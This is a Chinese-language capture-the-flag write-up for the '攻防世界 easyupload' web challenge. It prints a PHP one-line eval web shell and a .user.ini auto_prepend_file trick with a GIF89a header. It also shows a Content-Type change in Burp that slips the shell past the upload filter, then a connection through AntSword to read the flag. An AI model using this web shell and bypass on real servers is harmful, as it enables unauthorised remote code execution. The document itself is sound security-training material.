Skip to content

WEB-攻防世界easyupload

  • 关键词 文件上传,命令执行

题目描述

995ad16da922411a0063af65fd2c3869.png

解题思路

根据题目和页面我们可以猜到这应该是一个利用文件上传漏洞,利用一句话木马来获取服务器上保存的flag

  • 附:php一句话木马
php
<?php @eval($_REQUEST['a']); ?>
# 或者
<?=eval($_REQUEST['a']);?>

上传成功的话可以使用蚁剑连接

3fde308613e1633c8578e6024d1a73d1.png 新建一个txt文件并写入这句话,把后缀名改成jpg并上传。结果提示Your file looks wicked ace65b56474c1525e3359fbf9904edc4.png

抓包改后缀,.php1~.php9、.htaccess均被过滤(.htaccess 文件是一个用于配置 Apache Web 服务器的配置文件。它通常位于网站根目录或特定目录中,用来为该目录及其子目录提供特定的配置指令)

此时查看wp,发现是使用user.ini的配置文件的漏洞 详见https://wooyun.js.org/drops/user.ini文件构成的PHP后门.html

payload

  1. 新建.user.ini文件,写入以下内容
GIF89a
auto_prepend_file=a.jpg
  1. 上传该文件,burp抓包修改,将Content-Type: application/octet-stream修改为 Content-Type: image/jpg48fad5203c93311ea34f1b8066f15574.png 修改之后点击发送,返回结果为: 3a93fd2aac2663f64ffad510a64fe75c.png

  2. 新建a.jpg,写入如下内容

php
<?=eval($_REQUEST['a']);?>

e51365fe5e13948e4dbd06fc3ea7cd06.png

直接上传 ef0a36fe5c391870a5a99a707192eae2.png 显示上传成功

  1. 用蚁剑连接 f19f78026f158ed56b512111ad091098.png 在根目录下找到flag,直接查看即可 d184ab361eb3cee6fca29af522d83540.png